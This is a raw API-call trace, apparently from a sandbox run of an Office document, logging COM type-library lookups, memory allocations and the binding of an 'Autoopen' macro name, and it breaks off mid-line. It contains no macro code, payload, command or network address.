ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd1, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd2, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd3, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd4, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd5, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd6, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd7, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd8, ppFuncDesc=0x186a18, pDummy=0x140 | out: ppFuncDesc=0x186a18, pDummy=0x140) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd9, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xda, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdb, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdc, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdd, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xde, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdf, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe0, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe1, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe2, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe3, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.357] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.357] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe4, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe5, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe6, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe7, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe8, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe9, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xea, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xeb, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xec, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xed, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xee, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xef, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf0, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf1, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf2, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf3, ppFuncDesc=0x186a18, pDummy=0x140 | out: ppFuncDesc=0x186a18, pDummy=0x140) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf4, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf5, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf6, ppFuncDesc=0x186a18, pDummy=0x140 | out: ppFuncDesc=0x186a18, pDummy=0x140) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf7, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.358] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf8, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.358] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.359] ITypeInfo2:GetCustData (in: This=0x6a86060, GUID=0x7fee45dd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x186a48 | out: pVarVal=0x186a48*(varType=0x0, wReserved1=0x0, wReserved2=0x1b8, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0041.359] IUnknown:Release (This=0x6a86060) returned 0x2 [0041.359] ITypeInfo:RemoteGetDocumentation (in: This=0x6a86060, memid=-1, refPtrFlags=0x186a40, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x186950, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0041.359] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0041.359] IMalloc:Alloc (This=0x7feffc15380, cb=0x90) returned 0x6bac770 [0041.359] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0db20 [0041.359] IMalloc:Alloc (This=0x7feffc15380, cb=0x3d0) returned 0x6bd3150 [0041.359] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9880 [0041.359] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c327b0 [0041.359] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f160 [0041.359] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14010 [0041.359] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13fe0 [0041.359] IUnknown:AddRef (This=0x6990960) returned 0x5 [0041.359] IUnknown:QueryInterface (in: This=0x6990960, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186af0 | out: ppvObject=0x186af0*=0x0) returned 0x80004002 [0041.359] ITypeLib:GetTypeComp (in: This=0x6990960, ppTComp=0x186ae8 | out: ppTComp=0x186ae8*=0x6990970) returned 0x0 [0041.359] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x6889770 [0041.359] IUnknown:AddRef (This=0x6990970) returned 0x7 [0041.360] IUnknown:Release (This=0x6990970) returned 0x6 [0041.360] IUnknown:Release (This=0x6990960) returned 0x5 [0041.360] IUnknown:AddRef (This=0x6992850) returned 0xd [0041.360] IUnknown:QueryInterface (in: This=0x6992850, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186af0 | out: ppvObject=0x186af0*=0x0) returned 0x80004002 [0041.360] ITypeLib:GetTypeComp (in: This=0x6992850, ppTComp=0x186ae8 | out: ppTComp=0x186ae8*=0x6992860) returned 0x0 [0041.360] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x688c8f0 [0041.360] IUnknown:AddRef (This=0x6992860) returned 0xf [0041.360] IUnknown:Release (This=0x6992860) returned 0xe [0041.360] IUnknown:Release (This=0x6992850) returned 0xd [0041.360] IUnknown:AddRef (This=0x6992df0) returned 0x6 [0041.360] IUnknown:QueryInterface (in: This=0x6992df0, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186af0 | out: ppvObject=0x186af0*=0x0) returned 0x80004002 [0041.360] ITypeLib:GetTypeComp (in: This=0x6992df0, ppTComp=0x186ae8 | out: ppTComp=0x186ae8*=0x6992e00) returned 0x0 [0041.360] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x6889370 [0041.360] IUnknown:AddRef (This=0x6992e00) returned 0x8 [0041.360] IUnknown:Release (This=0x6992e00) returned 0x7 [0041.360] IUnknown:Release (This=0x6992df0) returned 0x6 [0041.360] wcscpy_s (in: _Destination=0x68f12f8, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0041.360] wcsncpy_s (in: _Destination=0x1866d0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0041.360] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0041.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x186600, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0041.360] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0041.361] IMalloc:Alloc (This=0x7feffc15380, cb=0x40) returned 0x6b85220 [0041.361] IUnknown:AddRef (This=0x6992580) returned 0x4 [0041.361] IUnknown:QueryInterface (in: This=0x6992580, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186af0 | out: ppvObject=0x186af0*=0x0) returned 0x80004002 [0041.361] ITypeLib:GetTypeComp (in: This=0x6992580, ppTComp=0x186ae8 | out: ppTComp=0x186ae8*=0x6992590) returned 0x0 [0041.361] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x68894b0 [0041.361] IUnknown:AddRef (This=0x6992590) returned 0x6 [0041.361] IUnknown:Release (This=0x6992590) returned 0x5 [0041.361] IUnknown:Release (This=0x6992580) returned 0x4 [0041.361] IUnknown:AddRef (This=0x6993ed0) returned 0x2 [0041.361] IUnknown:QueryInterface (in: This=0x6993ed0, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186af0 | out: ppvObject=0x186af0*=0x0) returned 0x80004002 [0041.361] ITypeLib:GetTypeComp (in: This=0x6993ed0, ppTComp=0x186ae8 | out: ppTComp=0x186ae8*=0x6993ee0) returned 0x0 [0041.361] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x6879630 [0041.361] IUnknown:AddRef (This=0x6993ee0) returned 0x4 [0041.361] IUnknown:Release (This=0x6993ee0) returned 0x3 [0041.361] IUnknown:Release (This=0x6993ed0) returned 0x2 [0041.361] IUnknown:Release (This=0x6a86060) returned 0x1 [0041.361] IMalloc:Alloc (This=0x7feffc15380, cb=0x40) returned 0x6b85270 [0041.361] IMalloc:Realloc (This=0x7feffc15380, pv=0x6bac770, cb=0xa0) returned 0x6c29d20 [0041.362] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Autoopen") returned 0x102ad9 [0041.362] strcpy_s (in: _Dst=0x186a20, _DstSize=0x9, _Src="Autoopen" | out: _Dst="Autoopen") returned 0x0 [0041.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x186a20, cbMultiByte=9, lpWideCharStr=0x186870, cchWideChar=9 | out: lpWideCharStr="Autoopen") returned 9 [0041.362] IUnknown:AddRef (This=0x6990960) returned 0x6 [0041.362] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="Autoopen", lHashVal=0x102ad9, pfName=0x186940, pBstrLibName=0x186870 | out: pfName=0x186940*=0, pBstrLibName=0x186870) returned 0x0 [0041.362] IUnknown:Release (This=0x6990960) returned 0x5 [0041.362] IUnknown:AddRef (This=0x6992850) returned 0xe [0041.362] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="Autoopen", lHashVal=0x102ad9, pfName=0x186940, pBstrLibName=0x186870 | out: pfName=0x186940*=0, pBstrLibName=0x186870) returned 0x0 [0041.362] IUnknown:Release (This=0x6992850) returned 0xd [0041.362] IUnknown:AddRef (This=0x6992df0) returned 0x7 [0041.362] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="Autoopen", lHashVal=0x102ad9, pfName=0x186940, pBstrLibName=0x186870 | out: pfName=0x186940*=0, pBstrLibName=0x186870) returned 0x0 [0041.362] IUnknown:Release (This=0x6992df0) returned 0x6 [0041.362] IUnknown:AddRef (This=0x6992580) returned 0x5 [0041.362] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="Autoopen", lHashVal=0x102ad9, pfName=0x186940, pBstrLibName=0x186870 | out: pfName=0x186940*=0, pBstrLibName=0x186870) returned 0x0 [0041.362] IUnknown:Release (This=0x6992580) returned 0x4 [0041.362] IMalloc:Alloc (This=0x7feffc15380, cb=0x50) returned 0x6a67800 [0041.362] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0dd60 [0041.362] IMalloc:Alloc (This=0x7feffc15380, cb=0x3d0) returned 0x6bd3530 [0041.362] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9460 [0041.362] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c327d0 [0041.362] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9fa60 [0041.362] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14150 [0041.362] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14160 [0041.362] IUnknown:AddRef (This=0x6990960) returned 0x6 [0041.362] IUnknown:QueryInterface (in: This=0x6990960, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186860 | out: ppvObject=0x186860*=0x0) returned 0x80004002 [0041.362] ITypeLib:GetTypeComp (in: This=0x6990960, ppTComp=0x186858 | out: ppTComp=0x186858*=0x6990970) returned 0x0 [0041.363] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x6889230 [0041.363] IUnknown:AddRef (This=0x6990970) returned 0x8 [0041.363] IUnknown:Release (This=0x6990970) returned 0x7 [0041.363] IUnknown:Release (This=0x6990960) returned 0x6 [0041.363] IUnknown:AddRef (This=0x6992850) returned 0xf [0041.363] IUnknown:QueryInterface (in: This=0x6992850, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186860 | out: ppvObject=0x186860*=0x0) returned 0x80004002 [0041.363] ITypeLib:GetTypeComp (in: This=0x6992850, ppTComp=0x186858 | out: ppTComp=0x186858*=0x6992860) returned 0x0 [0041.363] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x688cc30 [0041.363] IUnknown:AddRef (This=0x6992860) returned 0x11 [0041.363] IUnknown:Release (This=0x6992860) returned 0x10 [0041.363] IUnknown:Release (This=0x6992850) returned 0xf [0041.363] IUnknown:AddRef (This=0x6992df0) returned 0x7 [0041.363] IUnknown:QueryInterface (in: This=0x6992df0, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186860 | out: ppvObject=0x186860*=0x0) returned 0x80004002 [0041.363] ITypeLib:GetTypeComp (in: This=0x6992df0, ppTComp=0x186858 | out: ppTComp=0x186858*=0x6992e00) returned 0x0 [0041.363] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x688cbf0 [0041.363] IUnknown:AddRef (This=0x6992e00) returned 0x9 [0041.363] IUnknown:Release (This=0x6992e00) returned 0x8 [0041.363] IUnknown:Release (This=0x6992df0) returned 0x7 [0041.363] IUnknown:AddRef (This=0x6992580) returned 0x5 [0041.363] IUnknown:QueryInterface (in: This=0x6992580, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186860 | out: ppvObject=0x186860*=0x0) returned 0x80004002 [0041.363] ITypeLib:GetTypeComp (in: This=0x6992580, ppTComp=0x186858 | out: ppTComp=0x186858*=0x6992590) returned 0x0 [0041.363] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x688cbb0 [0041.363] IUnknown:AddRef (This=0x6992590) returned 0x7 [0041.363] IUnknown:Release (This=0x6992590) returned 0x6 [0041.363] IUnknown:Release (This=0x6992580) returned 0x5 [0041.363] IUnknown:QueryInterface (in: This=0x6a86110, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1868f8 | out: ppvObject=0x1868f8*=0x0) returned 0x80004002 [0041.363] IUnknown:QueryInterface (in: This=0x6a86110, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186900 | out: ppvObject=0x186900*=0x0) returned 0x80004002 [0041.363] ITypeInfo:GetTypeComp (in: This=0x6a86110, ppTComp=0x186908 | out: ppTComp=0x186908*=0x6a86118) returned 0x0 [0041.363] IMalloc:Alloc (This=0x7feffc15380, cb=0x38) returned 0x688cb70 [0041.364] IUnknown:AddRef (This=0x6a86118) returned 0x5 [0041.364] IUnknown:Release (This=0x6a86118) returned 0x4 [0041.364] IMalloc:Realloc (This=0x7feffc15380, pv=0x6a67800, cb=0x60) returned 0x6c6a260 [0041.364] IUnknown:Release (This=0x6a86110) returned 0x3 [0041.364] IUnknown:Release (This=0x6a86110) returned 0x2 [0041.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5a62b6a, cbMultiByte=9, lpWideCharStr=0x186870, cchWideChar=10 | out: lpWideCharStr="Autoopen") returned 9 [0041.364] IMalloc:Alloc (This=0x7feffc15380, cb=0x640) returned 0x69d7df0 [0041.364] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9280 [0041.364] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14170 [0041.364] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14180 [0041.364] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9070 [0041.364] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9faf0 [0041.364] ITypeComp:RemoteBind (in: This=0x6a86118, szName="Autoopen", lHashVal=0x102ad9, wFlags=0x0, ppTInfo=0x186828, pDescKind=0x18683c, ppFuncDesc=0x186840, ppVarDesc=0x7feffa43907, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x186828*=0x0, pDescKind=0x18683c*=0, ppFuncDesc=0x186840, ppVarDesc=0x7feffa43907, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0041.365] _mbscpy_s (in: _Dst=0x186d10, _DstSizeInBytes=0x9, _Src=0x38a2b62 | out: _Dst=0x186d10) returned 0x0 [0041.365] CoCreateGuid (in: pguid=0x186ed0 | out: pguid=0x186ed0*(Data1=0x8e6d366e, Data2=0x17de, Data3=0x454b, Data4=([0]=0x8d, [1]=0x45, [2]=0x8e, [3]=0x75, [4]=0xe, [5]=0x33, [6]=0x56, [7]=0x6f))) returned 0x0 [0041.365] CoCreateGuid (in: pguid=0x186ed0 | out: pguid=0x186ed0*(Data1=0xbc39a435, Data2=0xd341, Data3=0x4766, Data4=([0]=0xa7, [1]=0x3b, [2]=0x7f, [3]=0x13, [4]=0x39, [5]=0x37, [6]=0xb1, [7]=0x68))) returned 0x0 [0041.365] IMalloc:Alloc (This=0x7feffc15380, cb=0x14) returned 0x6c32830 [0041.365] IUnknown:Release (This=0x6a861c0) returned 0x5 [0041.365] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187008 | out: ppvObject=0x187008*=0x0) returned 0x80004002 [0041.365] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9fb80 [0041.365] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0dee0 [0041.365] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0dfa0 [0041.365] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6ca6680 [0041.365] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6ca68d0 [0041.365] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, 